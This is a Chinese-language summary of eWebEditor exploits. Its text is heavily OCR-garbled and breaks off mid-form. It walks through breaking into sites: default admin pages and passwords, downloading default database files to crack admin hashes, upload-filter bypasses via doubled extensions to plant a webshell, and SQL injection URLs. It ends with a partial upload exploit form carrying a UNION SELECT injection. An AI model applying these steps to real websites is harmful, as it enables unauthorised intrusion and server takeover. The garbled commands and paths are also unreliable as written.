ewebeitr漏洞利用总结.docVIP

eebeditr漏洞利用总结 eebeditr漏洞利用总结 先从最基本的记录起！通常入侵eebeditr编辑器的步骤 如下： 、首先访问默认管理页看是否存在。 默认管理贞地址2. 80以前为eebeditr/adin_lgin. asp以 后版本为 adin/lgin. asp 2、 默认管理帐号密码！ 默认管理页存在！我们就用帐号密码登陆！默认帐号密码 为：adinadin888 !常用的密码还有 adinadi n999adinl adinOOO之类的。 3、 默认数据库地址。 如果密码不是默认的。我们就访问是不是默认数据库！尝 试不载数据库得到管理员密码！管理员的帐号密码，都在 eebEd itr_Sste 表段里，ss_U serNaeSs _UserPass 都是 d 加 密的。得到了加密密码。可以去.d.xd.rg等网站进行查询！ 暴力这活好久不干了！也可以丢国外一些可以跑密码的网站去 跑！ 默认数据库路径为:eebedit r/db/eebe ditr. db常用数据 库路径为：e ebeditr/d b/eebedit r. asaeeb editr/db/ eebeditr . aspeebed itr/db/#e ebeditr. asaeebedi tr/db/#e ebeditr. dbeebedit r/db/!#e ebeditr. a speebedit r/db/eeb editrlO33 . db 等 很多管理员常改.asp后缀，一般访问.asp. asa后缀的都 是乱码！可以用下载工具下载下来，然后更改后缀为.db来查 看内容！ 4、说说漏洞基本利用步骤，还以asp为例！ 登陆后台以后。选择样式管理，默认编辑器的默认样式都 不可以修改的。我们可以从任意样式新建一个样式，然后在图 片上传添加可上传后缀。.a sa. er. dx等！ . asp过滤过了。但 是我们可以用.a saspp后缀来添加，这样上传文正好被 eebeditr吃掉asp后缀，剩下.asp呵呵！代码不详细说了。 总之是个很可笑的过滤！同样，如果遇到一个管理员有安全意 识的，从代码里，把.asp.asa.er.dx都完全禁止了，我们也 可以用.asasaa后缀来突破。添加完了后缀，可以在样式管理， 点击预览，然后上传！ 、默认管理页不存在！ 在实际入侵过程中，有很多默认的管理页不存在的时候。 我们可以直接访问样式管理页面eebeditr /adin_st le. asp然 后用第4步的方式拿ebs hello如果样式管理页也不存在的话， 我们可以看数据库内的样式表(eebedi tr_stle)里面有没有 比我们先进去的朋友留下的样式。然后构造上传！具体url 如下:eebE ditr/eeb editr. asp ?id=nten tap: stle =红色部分 是我们发现被修改添加了 a sa后缀的样式名，大家自行修改! 6、eebeditr的几个版本存在注入！ eebedit r以前版本都存在注入eebedit r/eebedit r. asp?id=artile_ntentap; s tle=Full_v200! 添加验证字符串，和管理员字段可以跑出管理员的d加密 密码！ e ebeditrv 2. 1. 6存在注入，可以用uninse let添加上传 后缀进行上传！先贴漏洞利用方式！ It ;H3gt ;eeb editrasp版2. 1. 6上传漏洞利用程序 It ;/H3gt; It;b rgt; It ;brg t: It ;fr atin=〃h ttp://xxx. /e ebeditr/u plad. asp? atin=sav eap; tpe=IAGEap; s tle=stand ard’ unins eletS_ID, S_Nae, S_D ir, S_SS, S JJpladDir，S_idth, S _Height, S_ e, S IsS s, S FileE xt, S Flash Ext, [S IageExt]%2b’ er’，S_e diaExt, S_F ileSize, S FlashSize, S lageSiz e, S_ediaS ize, S_Stat eFlag, S_De tetFr rd, S_Init de, S Base Urlfree beditr st leheres nae=，stan dard’ and’ a ’ =’ a〃eth d=pstnae =fren tpe=〃ult ipart/fr - data〃gt; It; inputt pe=filena e=upladf ilesize=10 Ogt; It:brg t;It;brgt; It: i